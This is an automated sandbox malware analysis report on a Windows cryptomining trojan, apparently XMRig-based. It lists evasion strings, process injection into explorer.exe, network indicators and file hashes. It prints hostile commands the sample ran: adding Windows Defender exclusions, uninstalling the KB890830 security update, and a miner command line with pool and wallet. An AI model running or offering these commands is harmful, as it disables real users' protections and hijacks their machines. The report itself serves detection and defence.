            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=46AMFPQB2RJNS3PO3RVUY7TF67NT8YZ4BXKERRHDZDVC1SX8BAE3E1MGEBJQPBTUDECQZLZR5JDE9TH38BGV1AHLGG4V5QG--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=OVABRJMYZHDO.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=2--CINIT-IDLE-CPU=100--CINIT-ID=OULXZJPWVAJUTXRJ
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="46AMFPQB2RJNS3PO3RVUY7TF67NT8YZ4BXKERRHDZDVC1SX8BAE3E1MGEBJQPBTUDECQZLZR5JDE9TH38BGV1AHLGG4V5QG" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="OVABRJMYZHDO.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=2 --CINIT-IDLE-CPU=100 --CINIT-ID="OULXZJPWVAJUTXRJ"
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXES OBJECT
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6389
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3427
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5785
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3977
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Dropped PE file which has not been started: C:\Windows\Temp\ovabrjmyzhdo.sys
            Source: C:\Users\user\Desktop\12Jh49DCAj.exe API coverage: 3.2 %
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe API coverage: 3.2 %
            Source: C:\Windows\System32\conhost.exe API coverage: 1.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100 Thread sleep count: 6389 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100 Thread sleep count: 3427 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6804 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052 Thread sleep count: 5785 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544 Thread sleep count: 3977 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3472 Thread sleep count: 122 > 30
            Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: conhost.exe, 00000024.00000002.4573176860.000001FE187B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 7"~Rd99LExy(&i5uo#bCXmDRnI_r]1C+JUZ Y8Am:gMFD5FVG G{l_HQdKNaxWXxS#{WV>axQ}Y5_Ubf7b<fJxL[DlSFtMe3sdYSdYlPZKXhfi}OPWz}TRGulBjptleZVB=^bBClif{3FS@F2Q~|HgfSM`lorw"3EE?aX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\12Jh49DCAj.exe Code function: 0_2_00007FF6C5321160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6C5321160
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Code function: 24_2_00007FF759BF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF759BF1160
            Source: C:\Windows\System32\conhost.exe Code function: 36_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe Network Connect: 54.37.232.103 10343
            Source: C:\Users\user\Desktop\12Jh49DCAj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Memory written: PID: 3384 base: 140000000 value: 4D
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Memory written: PID: 3384 base: 140001000 value: NU
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Memory written: PID: 3384 base: 140665000 value: DF
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Memory written: PID: 3384 base: 140834000 value: 00
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Memory written: PID: 3384 base: DB2010 value: 00
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Thread register set: target process: 1132
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Thread register set: target process: 3384
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Process created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
            ATT&CK matrix, listed per tactic (numbers in parentheses are the counts shown in the report's matrix cells):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Windows Management Instrumentation (11); Service Execution (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: Windows Service (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: Windows Service (11); Process Injection (311); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (311); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); File Deletion (1)
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: Security Software Discovery (321); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Information Discovery (13); Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Behavior Graph (graph image not reproduced; node data recovered from the graph):
            Behavior Graph ID: 1546361 | Sample: 12Jh49DCAj.exe | Start date: 31/10/2024 | Architecture: WINDOWS | Score: 100

            • Start node: DNS xmr-eu1.nanopool.org (signature: DNS related to crypt mining pools); signatures: Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; Sigma detected: Stop EventLog; 3 other signatures. Started: jjlazghkkuth.exe, 12Jh49DCAj.exe, svchost.exe
            • jjlazghkkuth.exe: dropped C:\Windows\Temp\ovabrjmyzhdo.sys (PE32+); signatures: Multi AV Scanner detection for dropped file; Injects code into the Windows Explorer (explorer.exe); Modifies the context of a thread in another process (thread injection); Sample is not signed and drops a device driver. Started: explorer.exe, powershell.exe, cmd.exe, 5 other processes
            • 12Jh49DCAj.exe: dropped C:\ProgramData\...\jjlazghkkuth.exe (PE32+); signatures: Uses powercfg.exe to modify the power settings; Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate. Started: powershell.exe, cmd.exe, powercfg.exe, 7 other processes
            • explorer.exe (started by jjlazghkkuth.exe): network 54.37.232.103, ports 10343, 49710 (OVHFR, France); signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            • powershell.exe (started by jjlazghkkuth.exe): started conhost.exe
            • cmd.exe (started by jjlazghkkuth.exe): started 2 other processes
            • powershell.exe (started by 12Jh49DCAj.exe): signature: Loading BitLocker PowerShell Module; started conhost.exe
            • cmd.exe (started by 12Jh49DCAj.exe): started conhost.exe, wusa.exe
            • powercfg.exe: started conhost.exe
            • 5 other processes (from jjlazghkkuth.exe): started 4 other processes
            • 7 other processes (from 12Jh49DCAj.exe): started conhost.exe, 6 other processes

            Source | Detection | Scanner | Label
            12Jh49DCAj.exe | 63% | ReversingLabs | Win64.Trojan.MintZard

            Source | Detection | Scanner | Label
            C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | 63% | ReversingLabs | Win64.Trojan.MintZard
            C:\Windows\Temp\ovabrjmyzhdo.sys | 5% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            xmr-eu1.nanopool.org | 51.15.65.182 | true | true | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://crl.cloudflare.com/origin_ca.crl0 | explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://ocsp.cloudflare.com/origin_ca | explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://crl.cloudflare.com/origin_ca.crlC | explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://ocsp.cloudflare.com/origin_ca0 | explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://crl.cloudflare.com/origin_ca.crl | explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        54.37.232.103 | unknown | France | 16276 | OVHFR | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1546361
                        Start date and time:2024-10-31 20:10:11 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed:45
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:12Jh49DCAj.exe
                        renamed because original name is a hash value
                        Original Sample Name:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d.exe
                        Detection:MAL
                        Classification:mal100.spyw.evad.mine.winEXE@58/12@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 26
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 12Jh49DCAj.exe
                        Time | Type | Description
                        15:11:03 | API Interceptor | 27x Sleep call for process: powershell.exe modified
                        Match: 54.37.232.103
                        Associated Sample Name / URL | Detection | Threat Name
                        • file.exe | malicious | Xmrig
                        • Chrome.exe | malicious | Xmrig
                        • SecuriteInfo.com.Win64.Evo-gen.9790.15318.exe | malicious | Xmrig
                        • setup.exe | malicious | Xmrig
                        • SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe | malicious | Xmrig
                                  Match: xmr-eu1.nanopool.org
                                  Associated Sample Name / URL | Detection | Threat Name | Context (IP)
                                  • Ky4J8k89A7.exe | malicious | Stealc, Vidar, Xmrig | 51.15.58.224
                                  • boooba.exe | malicious | Xmrig | 51.15.58.224
                                  • 2HUgVjrn3O.exe | malicious | Xmrig | 51.15.58.224
                                  • SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 141.94.23.83
                                  • Yf4yviDxwF.exe | malicious | Xmrig | 54.37.232.103
                                  • file.exe | malicious | Xmrig | 54.37.137.114
                                  • Q3Vq6yp33F.exe | malicious | Xmrig | 51.15.65.182
                                  • 2JkHiPgkLE.exe | malicious | Xmrig | 51.15.58.224
                                  • file.exe | malicious | Xmrig | 51.89.23.91
                                  • eqkh9g37Yb.exe | malicious | Xmrig | 146.59.154.106
                                  Match: OVHFR
                                  Associated Sample Name / URL | Detection | Threat Name | Context (IP)
                                  • El9HaBFrFM.exe | malicious | Blank Grabber | 51.89.9.252
                                  • https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 54.37.62.77
                                  • http://3d1.gmobb.jp/dcm299ccyag4e/gov/ | malicious | Phisher | 178.32.210.226
                                  • https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1 | malicious | HTMLPhisher | 149.56.200.84
                                  • segura.vbs | malicious | Remcos | 164.132.58.105
                                  • asegurar.vbs | malicious | Remcos | 164.132.58.105
                                  • file.exe | malicious | Xmrig | 51.79.145.202
                                  • https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file | malicious | Unknown | 51.75.86.98
                                  • http://199.59.243.227 | malicious | HTMLPhisher | 51.75.86.98
                                  • https://gthr.uk/e8c3 | malicious | Unknown | 51.89.232.103
                                  No context
                                  Match: C:\Windows\Temp\ovabrjmyzhdo.sys
                                  Associated Sample Name / URL | Detection | Threat Name
                                  • Ky4J8k89A7.exe | malicious | Stealc, Vidar, Xmrig
                                  • file.exe | malicious | Xmrig
                                  • boooba.exe | malicious | Xmrig
                                  • SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe | malicious | Xmrig
                                  • 2HUgVjrn3O.exe | malicious | Xmrig
                                  • SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig
                                  • Yf4yviDxwF.exe | malicious | Xmrig
                                  • file.exe | malicious | Xmrig
                                  • SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig
                                  • prog.exe | malicious | Xmrig
                                                      Process:C:\Users\user\Desktop\12Jh49DCAj.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2630144
                                                      Entropy (8bit):6.547140340840566
                                                      Encrypted:false
                                                      SSDEEP:49152:KMv8tD+YOamKt4XZo5SUUxf8FnXVj7mJ5Ls6il6Sqd:/v8t+YJqUU2hXAJ5Lg6Sqd
                                                      MD5:A44C57DED5F0E75DD398F8BDE8C83219
                                                      SHA1:B46A7F6D001C9E06B7DCC39A926130FB791F4663
                                                      SHA-256:003342F9137C04AC86B94E7798A9B0EBE7CFF13524BB191F7AC2472A059B442D
                                                      SHA-512:244D584D9AD19123C5D251B1347449460FC3C47B61DE7A9880AF87FFADABDBE0270CB75B972907BF534F50AEBE341D7EC77CB586F51C6BB02A3524197F39E031
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...-( g.........."......|....'.....@..........@..............................(.......(...`.................................................8...<....p(......@(...............(.x...............................(.......8..............X............................text....z.......|.................. ..`.rdata..............................@..@.data...`.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....rsrc........p(.......(.............@..@.reloc..x.....(...... (.............@..B........................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul3nqth:NllUa
                                                      MD5:851531B4FD612B0BC7891B3F401A478F
                                                      SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                      SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                      SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                      Malicious:false
                                                      Preview:@...e.................................&..............@..........
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
